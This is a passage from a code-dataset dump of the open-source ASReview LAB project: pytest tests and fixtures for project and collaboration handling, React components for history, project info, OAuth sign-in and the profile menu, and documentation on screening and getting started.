crud.count_projects() == 1\n # get project\n project = crud.last_project()\n # delete\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_users() == 1\n assert crud.count_projects() == 0\n\n\n# deleting a project will remove invitations\ndef test_project_removal_invitations(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_invitations() == 0\n # invite\n project.pending_invitations.append(user2)\n DB.session.commit()\n assert crud.count_invitations() == 1\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_projects() == 0\n assert crud.count_invitations() == 0\n\n\n# deleting a project will remove collaboration links\ndef test_project_removal_collaborations(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_collaborations() == 0\n # invite\n project.collaborators.append(user2)\n DB.session.commit()\n assert crud.count_collaborations() == 1\n DB.session.delete(project)\n DB.session.commit()\n assert crud.count_projects() == 0\n assert crud.count_collaborations() == 0\n\n\n# #############\n# PROPERTIES\n# #############\n\n\n# test getting a user from project\ndef 
test_getting_user_from_project(user):\n project_id = \"my-project\"\n project = Project(project_id=project_id)\n crud.create_project(DB, user, project)\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.owner == user\n\n\n# test project_folder\ndef test_project_folder(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.folder == project_id\n\n\n# test project_path\ndef test_project_path(user):\n project_id = \"my-project\"\n crud.create_project(DB, user, Project(project_id=project_id))\n assert crud.count_projects() == 1\n # get project\n project = crud.last_project()\n assert project.project_path == Path(asreview_path() / project_id)\n\n\n# test pending invites\ndef test_pending_invites(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n # invite\n project.pending_invitations.append(user2)\n DB.session.commit()\n # fresh object\n project = crud.last_project()\n # asserts\n assert user2 in project.pending_invitations\n\n\n# test collaboration\ndef test_collaboration(user):\n project = crud.create_project(DB, user, Project(project_id=\"my-project\"))\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 1\n assert crud.count_collaborations() == 0\n # invite\n project.collaborators.append(user2)\n DB.session.commit()\n assert crud.count_collaborations() == 1\n # start with a fresh object\n project = crud.last_project()\n assert user2 in project.collaborators\n" }, { "alpha_fraction": 0.5322014093399048, "alphanum_fraction": 0.5333723425865173, "avg_line_length": 27.46666717529297, "blob_id": "48704502f8ac20d695eb89a39ac62c5ecf19ed75", "content_id": "158736fcd1d2e88d4fb139aa03554825947d62ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1708, "license_type": "permissive", "max_line_length": 75, "num_lines": 60, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/HistoryPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Divider, Fade } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { PageHeader } from \"../../Components\";\nimport { Filter, LabelChip, LabeledRecord } from \"../HistoryComponents\";\n\nconst PREFIX = \"HistoryPage\";\n\nconst classes = {\n cardWrapper: `${PREFIX}-card-wrapper`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.cardWrapper}`]: {\n paddingTop: 32,\n },\n}));\n\nconst HistoryPage = (props) => {\n return (\n <Root aria-label=\"history page\">\n <Fade in>\n <Box>\n <PageHeader header=\"History\" mobileScreen={props.mobileScreen} />\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <LabelChip\n mobileScreen={props.mobileScreen}\n label={props.label}\n setLabel={props.setLabel}\n />\n <Divider />\n <Filter\n mobileScreen={props.mobileScreen}\n filterQuery={props.filterQuery}\n setFilterQuery={props.setFilterQuery}\n />\n <Divider />\n </Box>\n <Box className=\"main-page-body-wrapper\">\n <Box className={`${classes.cardWrapper} main-page-body`}>\n <LabeledRecord\n label={props.label}\n 
filterQuery={props.filterQuery}\n isSimulating={props.isSimulating}\n mobileScreen={props.mobileScreen}\n mode={props.mode}\n />\n </Box>\n </Box>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default HistoryPage;\n" }, { "alpha_fraction": 0.6750811338424683, "alphanum_fraction": 0.6855391263961792, "avg_line_length": 34.5512809753418, "blob_id": "4d8c90638e024bae580d63ffd2424521ebf8caeb", "content_id": "678ea59f1d6feb6a207a9ebc3cfa8a9f381c6ee6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2773, "license_type": "permissive", "max_line_length": 68, "num_lines": 78, "path": "/asreview/webapp/tests/test_api/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\nfrom asreview.project import get_projects\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils import crud\nfrom asreview.webapp.tests.utils.config_parser import get_user\n\n\[email protected](params=[\"client_auth\", \"client_no_auth\"])\ndef setup(request):\n \"\"\"Setup and teardown fixture that will run each test with\n an authenticated version and unauthenticated version of the\n app. In the authenticated version the fixture yields a Flask\n client, a signed-in user plus a project belonging to this user.\n In the unauthenticated version, the fixture yields a Flask\n client, and a project.\"\"\"\n # get the client\n client = request.getfixturevalue(request.param)\n # provide a project name\n project_name = \"project_name\"\n if request.param == \"client_auth\":\n # create, signup and signin users\n user1 = au.create_and_signin_user(client, 1)\n # create a project for this logged in user\n au.create_project(client, project_name)\n # receive project\n project = user1.projects[0]\n else:\n # this has to be created to match the authenticated\n # version of this fixture\n user1 = None\n # create a project\n au.create_project(client, project_name)\n # get all project\n project = get_projects()[0]\n yield client, user1, project\n if request.param == \"client_auth\":\n # cleanup database and asreview_path\n crud.delete_everything(DB)\n\n\[email protected](\n params=[\n \"client_auth\",\n \"client_auth_no_creation\",\n \"client_auth_verified\",\n \"client_no_auth\",\n ]\n)\ndef setup_all_clients(request):\n \"\"\"This fixture provides 4 different Flask clients (authenticated\n and unauthenticated) for every test that uses it.\"\"\"\n client = request.getfixturevalue(request.param)\n yield client\n\n\[email protected]()\ndef setup_auth(client_auth):\n \"\"\"This fixture yields a Flask client for an authenticated\n app, 3 user accounts (first user is signed in) and a project\n belonging to the first user.\"\"\"\n # create, signup and signin users\n user1 = au.create_and_signin_user(client_auth, 1)\n user2 = get_user(2)\n user3 = get_user(3)\n # signup users 2 and 3\n au.signup_user(client_auth, user2)\n au.signup_user(client_auth, user3)\n # get users 2 and 3 from DB\n user2 = crud.get_user_by_identifier(user2.identifier)\n user3 = crud.get_user_by_identifier(user3.identifier)\n # create a project for this logged in user\n project_name = \"project_name\"\n au.create_project(client_auth, project_name)\n yield client_auth, user1, user2, user3, user1.projects[0]\n # cleanup database and asreview_path\n crud.delete_everything(DB)\n" }, { "alpha_fraction": 0.4924698770046234, "alphanum_fraction": 0.4974513351917267, "avg_line_length": 31.821292877197266, "blob_id": 
"f376bb7372b25ed95807c5402a7c62a935de9bd4", "content_id": "43b4166efca5fab61bdf5248f8c7c7c76753e7d1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5486, "license_type": "permissive", "max_line_length": 84, "num_lines": 185, "path": "/asreview/webapp/src/ProjectComponents/ProjectInfoForm.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n CircularProgress,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../Components\";\nimport { ProjectModeSelect } from \"../ProjectComponents\";\nimport { MouseOverPopover } from \"../StyledComponents/StyledPopover.js\";\nimport { TypographySubtitle1Medium } from \"../StyledComponents/StyledTypography.js\";\nimport { mapStateToProps } from \"../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ProjectInfoForm = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const fetchInfoState = queryClient.getQueryState([\n \"fetchInfo\",\n { project_id: props.project_id },\n ]);\n\n const isProjectSetup = () => {\n return !project_id;\n };\n\n const onFocus = () => {\n if (!isProjectSetup()) {\n // do nothing\n } else {\n props.setTextFieldFocused(true);\n }\n };\n\n const onBlur = () => {\n if (!isProjectSetup()) {\n // do nothing\n } else {\n props.setTextFieldFocused(false);\n }\n };\n\n const handleInfoChange = (event) => {\n if (!isProjectSetup()) {\n props.setInfo({\n ...props.info,\n [event.target.name]: event.target.value,\n });\n if (event.target.name === \"title\" && !event.target.value) {\n props.setDisableSaveButton(true);\n } else if (props.info?.title) {\n props.setDisableSaveButton(false);\n } else {\n // do nothing\n }\n props.setDisableUndoButton(false);\n } else {\n props.handleInfoChange(event);\n }\n };\n\n const refetchInfo = () => {\n queryClient.resetQueries(\"fetchInfo\");\n };\n\n return (\n <Root\n style={{\n width: !props.mobileScreen && !isProjectSetup() ? 
\"60%\" : \"100%\",\n }}\n >\n <Stack spacing={3}>\n <Box>\n {isProjectSetup() && (\n <Typography variant=\"h6\">Project information</Typography>\n )}\n {!isProjectSetup() && (\n <TypographySubtitle1Medium>\n Project information\n </TypographySubtitle1Medium>\n )}\n </Box>\n {isProjectSetup() && fetchInfoState?.isFetching && (\n <Box className=\"main-page-body-wrapper\">\n <CircularProgress />\n </Box>\n )}\n {((isProjectSetup() &&\n fetchInfoState.status !== \"error\" &&\n !fetchInfoState.isFetching) ||\n !isProjectSetup()) && (\n <Box component=\"form\" noValidate autoComplete=\"off\">\n <Stack direction=\"column\" spacing={3}>\n {!isProjectSetup() && (\n <MouseOverPopover title=\"Select mode when creating a new project\">\n <ProjectModeSelect\n disableModeSelect\n mode={props.info?.mode}\n handleMode={handleInfoChange}\n onBlur={onBlur}\n onFocus={onFocus}\n />\n </MouseOverPopover>\n )}\n {isProjectSetup() && (\n <ProjectModeSelect\n datasetAdded={props.datasetAdded}\n mode={props.info?.mode}\n handleMode={handleInfoChange}\n onBlur={onBlur}\n onFocus={onFocus}\n />\n )}\n <TextField\n autoFocus\n error={props.isMutateInfoError}\n fullWidth\n helperText={props.mutateInfoError?.message}\n id=\"project-title\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n InputLabelProps={{\n required: false,\n }}\n label=\"Title (required)\"\n name=\"title\"\n onChange={handleInfoChange}\n required\n value={props.info?.title}\n />\n <TextField\n fullWidth\n id=\"project-author\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n label=\"Author(s)\"\n name=\"authors\"\n onChange={handleInfoChange}\n value={props.info?.authors}\n />\n <TextField\n fullWidth\n id=\"project-description\"\n inputProps={{\n onFocus: () => onFocus(),\n onBlur: () => onBlur(),\n }}\n label=\"Description\"\n multiline\n minRows={8}\n name=\"description\"\n onChange={handleInfoChange}\n value={props.info?.description}\n />\n </Stack>\n </Box>\n )}\n {isProjectSetup() && fetchInfoState.status === \"error\" && (\n <InlineErrorHandler\n message={fetchInfoState.error?.message}\n refetch={refetchInfo}\n button\n />\n )}\n {props.isDeleteProjectError && (\n <InlineErrorHandler message={props.deleteProjectError?.message} />\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(ProjectInfoForm);\n" }, { "alpha_fraction": 0.5631298422813416, "alphanum_fraction": 0.5655009150505066, "avg_line_length": 28.086206436157227, "blob_id": "7f337184587dc13c4fb5556d33a67d7482d93516", "content_id": "d5230c55c2e335c9ab97daca87361196415b3545", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3374, "license_type": "permissive", "max_line_length": 84, "num_lines": 116, "path": "/asreview/webapp/src/Components/SignInOAuth.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "// The business logic of this component comes from the\n// following URL: https://tasoskakour.com/blog/react-use-oauth2\n\nimport * as React from \"react\";\nimport { useNavigate } from \"react-router-dom\";\nimport { IconButton, Stack, Typography } from \"@mui/material\";\nimport { GitHub, Google } from \"@mui/icons-material\";\nimport { Orcid } from \"../icons\";\nimport AuthAPI from \"../api/AuthAPI\";\nimport useAuth from \"../hooks/useAuth\";\nimport { InlineErrorHandler } from \".\";\nimport OauthPopup from \"react-oauth-popup\";\n\nconst POPUP_HEIGHT = 700;\nconst POPUP_WIDTH = 600;\n\nconst redirect_uri 
= `${window.location.origin}/oauth_callback`;\n\nconst generateOAuthUrl = (config) => {\n return (\n `${config.authorization_url}?response_type=code&client_id=${config.client_id}` +\n `&redirect_uri=${redirect_uri}&scope=${config.scope}&state=${config.state}`\n );\n};\n\nconst SignInOauth = (props) => {\n const classes = props.classes;\n const oAuthData = props.oAuthData;\n const oAuthServices = oAuthData.services;\n const { setAuth } = useAuth();\n const navigate = useNavigate();\n\n const [errorMessage, setErrorMessage] = React.useState(\"\");\n\n const handleSignin = (code, provider) => {\n let message = \"\";\n\n const payload = {\n provider: provider,\n code: code,\n redirect_uri: redirect_uri,\n };\n\n AuthAPI.oAuthCallback(payload)\n .then((data) => {\n if (data.logged_in) {\n setAuth({\n logged_in: data.logged_in,\n name: data.name,\n id: data.id,\n });\n // Authentication was successful, do we have\n // to go to the profile page (if this is the first\n // time), or do we go to projects\n if (Boolean(data?.account_created)) {\n navigate(\"/profile?first_time=true\");\n } else {\n navigate(\"/projects\");\n }\n } else {\n message = \"Backend could not log you in.\";\n console.error(message);\n setErrorMessage(message);\n }\n })\n .catch((err) => {\n message = \"Did not receive OAuth data from backend\";\n console.error(message, err);\n setErrorMessage(message);\n });\n };\n\n const getIcon = (service) => {\n switch (service) {\n case \"google\":\n return <Google />;\n case \"github\":\n return <GitHub />;\n case \"orcid\":\n return <Orcid />;\n default:\n return service;\n }\n };\n\n return (\n <>\n <Stack className={classes.button} direction=\"row\">\n <Typography variant=\"body1\">Or sign in with:</Typography>\n {Object.keys(oAuthServices).map((provider) => {\n let config = oAuthServices[provider];\n return (\n <OauthPopup\n url={generateOAuthUrl(config)}\n onCode={(code) => handleSignin(code, provider)}\n onClose={(data) => true}\n key={provider}\n width={POPUP_WIDTH}\n height={POPUP_HEIGHT}\n >\n <IconButton\n onClick={() => \"true\"} //handleOauthSignIn(provider)}\n key={provider}\n >\n {getIcon(provider)}\n </IconButton>\n </OauthPopup>\n );\n })}\n </Stack>\n {Boolean(errorMessage) && <InlineErrorHandler message={errorMessage} />}\n </>\n );\n};\n\nexport default SignInOauth;\n" }, { "alpha_fraction": 0.6945466995239258, "alphanum_fraction": 0.6977249979972839, "avg_line_length": 32.027626037597656, "blob_id": "aad1f2010897994ad2fad4bdbd3976ffb53857a5", "content_id": "3cce9b33bedb9fee722d8fe13327aece79af166c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5978, "license_type": "permissive", "max_line_length": 125, "num_lines": 181, "path": "/docs/source/screening.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Screening\n=========\n\n.. note::\n\n Only for Oracle and Exploration projects. Read more about :ref:`project_create:Project modes`.\n\n\nIntroduction\n------------\n\nAs soon as your project is initiated, you can start reviewing. Click on\n*Review* in the left menu if your project is not on the review page yet.\nASReview LAB presents you a title and abstract to screen and label.\n\nYou are asked to make a decision: relevant or irrelevant?\n\n.. figure:: ../images/project_screening.png\n :alt: ASReview Screening\n\n\nScreening in Oracle mode\n~~~~~~~~~~~~~~~~~~~~~~~~\n\nIn the Oracle mode, unlabeled records are presented to you. 
Depending on the\nselected strategy, it is the record most likely to be relevant (the default\nsetting) or one selected by another :ref:`project_create:Query Strategy`.\n\nClick on the decision of your choice, and a new record is presented to you. While\nyou review the next record, a new model is being trained. ASReview LAB\ncontinuously improves its understanding of your decisions, constantly updating\nthe underlying ordering of the records.\n\nEach labeling decision of the user starts the training of a new model, provided\nno model is being trained at that time. When this new model is trained,\nthe unseen records' rank order is updated. Training and labeling occur\nasynchronously. With fast models, a new ranking will probably be available\nbefore the user finishes reading the text. With slower models, training\ncontinues until a new model is trained, and the user can continue screening\nthe next record in line (2nd, 3rd, etc.). Therefore, the record shown to the\nuser can be the one with the highest relevance score of the second-to-last model\nor the highest-ranked as a result of the latest model until a new model is\ntrained.\n\nAs you keep reviewing documents and providing labels, you will probably see\nfewer relevant records. When to stop screening is left to you. See\n:doc:`progress` for more information on progress monitoring and information on\nwhen to stop.\n\n.. tip::\n\n If you are in doubt about your decision, take your time as you are the\n oracle. Based on your input, a new model will be trained, and you do not\n want to confuse the prediction model. If in doubt, it may be better to\n consult others, or to read the full text (in the case of reviewing abstracts of\n scientific papers).\n\nScreening in Exploration mode\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe Exploration mode is useful for teaching purposes because a blue bar is\ndisplayed on top of the record, indicating whether the record has been labeled\nrelevant or irrelevant in the dataset. You can make the same labeling\ndecision without the need to be the oracle.\n\n.. figure:: ../images/project_screening_exploration.png\n :alt: ASReview Screening\n\nAutosave\n--------\n\nYour decisions (and notes) are saved automatically into your ASReview project\nfile. There is no need to press any buttons to save your work anywhere in\nASReview LAB (in fact, there is not even a *save* button).\n\nChange decisions\n----------------\n\nIn some cases, you might want to change your previous decision. The screening\ninterface of ASReview LAB offers two options to change your decision.\n\nUndo last decision\n~~~~~~~~~~~~~~~~~~\n\nYou can return to your previous decision during screening.\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Label the record displayed on the screen as relevant or irrelevant.\n4. Click on *Undo* (at the bottom right).\n5. Click on *Keep (ir)relevant* or *Convert to (ir)relevant*.\n6. Continue screening.\n\nYou can disable\nthis option in the Settings menu.\n\nScreening history\n~~~~~~~~~~~~~~~~~\n\nAn overview of your decisions made during screening can be found on the\n**History** page. You can change decisions on this page.\n\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on History in the menu on the left.\n\n.. figure:: ../images/project_history.png\n :alt: Show project history\n\nChanging decisions on the history page\n\n4. To change a label of a record, click the heart icon. 
The next iteration of the model will take the new label into account.\n\n\nFull Text\n---------\n\nIf a column with Digital Object Identifiers (DOI) or URLs is available in the\nmetadata of your dataset, ASReview LAB will display the DOI and URL during\nscreening. Most of the time, DOIs point to the full-text of a publication. See\n:doc:`datasets <data>` for more information on including DOI and URL values to\nyour datasets.\n\n.. figure:: ../images/screening_full_text.png\n :alt: Digital Object Identifier (DOI)\n\n\nKeyboard shortcuts\n------------------\n\nASReview LAB supports the use of keyboard shortcuts during screening. The\ntable below lists the available keyboard shortcuts.\n\n\nYou can press a key (or a combination of keys) to label a record as relevant\nor irrelevant, or to return to the previous decision during screening.\nBy default, keyboard shortcuts are disabled.\n\n+-----------------------------+------------------------+\n| Action | Shortcut |\n+=============================+========================+\n| Label record as relevant | **r** or **Shift + r** |\n+-----------------------------+------------------------+\n| Label record as irrelevant | **i** or **Shift + i** |\n+-----------------------------+------------------------+\n| Return to previous decision | **u** or **Shift + u** |\n+-----------------------------+------------------------+\n\n\n.. note::\n\n Keyboard shortcuts are only available when the **Undo** feature has been\n enabled in the Settings (bottom left).\n\n\nDisplay\n-------\n\nDark mode\n~~~~~~~~~\n\nASReview LAB offers the option to customize the screening appearance and functionality.\n\n1. :doc:`start`.\n2. Click on *Settings* (bottom left).\n3. Go to *Display* and toggle the dark mode\n\n.. note::\n Your preference is saved in the browser.\n\n\nFont size\n~~~~~~~~~\n\nYou can make the text on the review screen smaller or larger.\n\n1. :doc:`start`.\n2. Click on *Settings* (bottom left).\n3. Go to *Display* and click on *Font size*.\n4. 
Slide the slider to the desired font size.\n" }, { "alpha_fraction": 0.7566371560096741, "alphanum_fraction": 0.7566371560096741, "avg_line_length": 27.25, "blob_id": "a5c3e718f6dbbc94af0ba3f3838e5d239c865c97", "content_id": "98887147b972e15b863f1b16c1a3c7169e7c57a1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "permissive", "max_line_length": 81, "num_lines": 16, "path": "/tests/asreview_files/convert_test_state.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\nfrom shutil import rmtree\nfrom zipfile import ZipFile\n\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\n\nold_fp = Path(\"tests\", \"asreview_files\", \"test_state_example_old.asreview\")\nnew_fp = Path(\"tests\", \"asreview_files\", \"test_state_example_converted.asreview\")\n\nif new_fp.exists():\n rmtree(new_fp)\n\nwith ZipFile(old_fp) as zipobj:\n zipobj.extractall(new_fp)\n\nupgrade_asreview_project_file(new_fp)\n" }, { "alpha_fraction": 0.4924698770046234, "alphanum_fraction": 0.4974513351917267, "avg_line_length": 31.821292877197266, "blob_id": "bcc7a789485db2345892e239f764dd8a574f4121", "content_id": "2923b6a2afde32505f528840cf6208a67ee649ea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8632, "license_type": "permissive", "max_line_length": 87, "num_lines": 263, "path": "/asreview/webapp/src/Components/ProfilePopper.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useDispatch, useSelector } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation, useQuery } from \"react-query\";\nimport {\n Avatar,\n Badge,\n Box,\n ButtonBase,\n ClickAwayListener,\n Divider,\n ListItemIcon,\n ListItemText,\n MenuItem,\n MenuList,\n Paper,\n Popper,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport MailIcon from \"@mui/icons-material/Mail\";\nimport { styled } from \"@mui/material/styles\";\nimport { Logout, GroupAdd, Person } from \"@mui/icons-material\";\n\nimport { StyledMenuItem } from \"../StyledComponents/StyledMenuItem\";\nimport { TypographySubtitle1Medium } from \"../StyledComponents/StyledTypography\";\n\nimport { AuthAPI, TeamAPI, ProjectAPI } from \"../api\";\nimport useAuth from \"../hooks/useAuth\";\nimport ElasAvatar from \"../images/ElasAvatar.svg\";\n\nimport { AcceptanceDialog } from \"../ProjectComponents/TeamComponents\";\nimport { useToggle } from \"../hooks/useToggle\";\nimport { setMyProjects } from \"../redux/actions\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst ProfilePopper = (props) => {\n const { auth, setAuth } = useAuth();\n const allowTeams = useSelector((state) => state.allow_teams);\n const navigate = useNavigate();\n\n const [projectInvitations, setProjectInvitations] = React.useState([]);\n const dispatch = useDispatch();\n\n const [onAcceptanceDialog, toggleAcceptanceDialog] = useToggle();\n\n const [anchorEl, setAnchorEl] = React.useState(null);\n const [open, setOpen] = React.useState(false);\n\n useQuery([\"getProjectInvitations\"], () => TeamAPI.getProjectInvitations(), {\n onSuccess: (data) => {\n setProjectInvitations(data[\"invited_for_projects\"] || []);\n },\n onError: (data) => {\n console.log(\"error\", data);\n },\n });\n\n const { mutate } = useMutation(AuthAPI.signout, {\n onSuccess: () => {\n 
setAuth({});\n },\n });\n\n const handleClick = (event) => {\n setAnchorEl(event.currentTarget);\n setOpen((prev) => !prev);\n };\n\n const handleClickAway = () => {\n setOpen(false);\n };\n\n const handleSignOut = () => {\n mutate();\n };\n\n const openAcceptanceDialog = () => {\n setOpen(false);\n toggleAcceptanceDialog();\n };\n\n const handleProfile = () => {\n setOpen(false);\n navigate(\"/profile\");\n };\n\n const acceptanceHandler = (project) => {\n // Call the API to accept the invitation, if that is successful\n // get list of all projects of this user and refresh the projects\n // list, remove from Dialog\n TeamAPI.acceptInvitation(project.project_id)\n .then((data) => {\n if (data.success) {\n // success, the invite was transformed into a collaboration, get all projects\n ProjectAPI.fetchProjects({})\n .then((data) => {\n if (data.result instanceof Array) {\n // refresh project list\n dispatch(setMyProjects(data.result));\n // remove project from Dialog table\n const newProjectList = projectInvitations.filter(\n (p) => p.id !== project.id,\n );\n setProjectInvitations(newProjectList);\n // close modal if there are no more invitations\n if (newProjectList.length === 0) {\n toggleAcceptanceDialog();\n }\n } else {\n console.log(\"Could not get projects list -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not pull all projects\", err));\n } else {\n console.log(\"Could not accept invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not accept invitation\", err));\n };\n\n const rejectionHandler = (project) => {\n // call API to remove the invitation\n TeamAPI.rejectInvitation(project.project_id)\n .then((data) => {\n if (data.success) {\n // remove project from Dialog table and close if there are\n // no more invitations\n const newProjectList = projectInvitations.filter(\n (p) => p.id !== project.id,\n );\n setProjectInvitations(newProjectList);\n // close modal if there are no more invitations\n if (newProjectList.length === 0) {\n toggleAcceptanceDialog();\n }\n } else {\n console.log(\"Could not reject invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not reject invitation\", err));\n };\n\n return (\n <Root>\n <ClickAwayListener onClickAway={handleClickAway}>\n <Box>\n <Tooltip title=\"Profile\">\n <ButtonBase onClick={handleClick}>\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 32 : 24,\n height: !props.mobileScreen ? 32 : 24,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.600\" : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n </ButtonBase>\n </Tooltip>\n <Popper\n open={open}\n anchorEl={anchorEl}\n placement=\"bottom-end\"\n sx={{ zIndex: \"tooltip\", mt: \"8px !important\" }}\n >\n <Paper variant=\"outlined\">\n <MenuList>\n <StyledMenuItem>\n <Stack\n direction=\"row\"\n spacing={2}\n sx={{ alignItems: \"center\" }}\n >\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 40 : 32,\n height: !props.mobileScreen ? 40 : 32,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\"\n ? 
\"grey.600\"\n : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n <TypographySubtitle1Medium>\n {auth?.name}\n </TypographySubtitle1Medium>\n </Stack>\n </StyledMenuItem>\n <Divider />\n\n <MenuItem onClick={handleProfile}>\n <ListItemIcon>\n <Person fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">Profile</Typography>\n </ListItemText>\n </MenuItem>\n\n {false && allowTeams && (\n <MenuItem onClick={openAcceptanceDialog}>\n <ListItemIcon>\n <GroupAdd fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">\n Collaboration Invites\n {projectInvitations.length > 0 && (\n <Badge\n badgeContent={projectInvitations.length}\n sx={{\n \"& .MuiBadge-badge\": {\n color: \"white\",\n backgroundColor: \"red\",\n fontSize: 11,\n },\n }}\n >\n <MailIcon color=\"action\" fontSize=\"small\" />\n </Badge>\n )}\n </Typography>\n </ListItemText>\n </MenuItem>\n )}\n\n <MenuItem onClick={handleSignOut}>\n <ListItemIcon>\n <Logout fontSize=\"small\" />\n </ListItemIcon>\n <ListItemText disableTypography>\n <Typography variant=\"body2\">Sign out</Typography>\n </ListItemText>\n </MenuItem>\n </MenuList>\n </Paper>\n </Popper>\n </Box>\n </ClickAwayListener>\n\n {allowTeams && (\n <AcceptanceDialog\n open={onAcceptanceDialog}\n onClose={toggleAcceptanceDialog}\n userId={auth.id}\n projectInvitations={projectInvitations}\n handleAcceptance={acceptanceHandler}\n handleRejection={rejectionHandler}\n />\n )}\n </Root>\n );\n};\n\nexport default ProfilePopper;\n" }, { "alpha_fraction": 0.740919828414917, "alphanum_fraction": 0.7476312518119812, "avg_line_length": 39.04743194580078, "blob_id": "c4f95919f2143d5dc086de7af064d0754c1263aa", "content_id": "34e905affb7920033f547c0c93f8ae17018967a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 10144, "license_type": "permissive", "max_line_length": 242, "num_lines": 253, "path": "/docs/source/about.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Get Started\n===========\n\nWhat is ASReview LAB?\n---------------------\n\nASReview LAB is a free (Libre) open-source machine learning tool for screening\nand systematically labeling a large collection of textual data. It's sometimes\nreferred to as a tool for title and abstract screening in systematic reviews\nor meta-analyses, but it can handle any type of textual data that must be\nscreened systematically, see the paper published in `Nature Machine Intelligence <https://www.nature.com/articles/s42256-020-00287-7>`_. \n\nASReview LAB implements three different options:\n\n- **Oracle:** Screen textual data in interaction with the active learning model. The reviewer is the 'oracle', making the labeling decisions.\n- **Simulation:** Evaluate the performance of active learning models on fully labeled data.\n- **Exploration:** Explore or demonstrate ASReview LAB with a completely labeled dataset. This mode is suitable for teaching purposes.\n\nASReview LAB is one of the products of the `ASReview research project\n<https://asreview.ai/about/>`_ initiated at Utrecht University, which has\ngrown into a vivid community of researchers, users, and developers from\naround the world.\n\n.. 
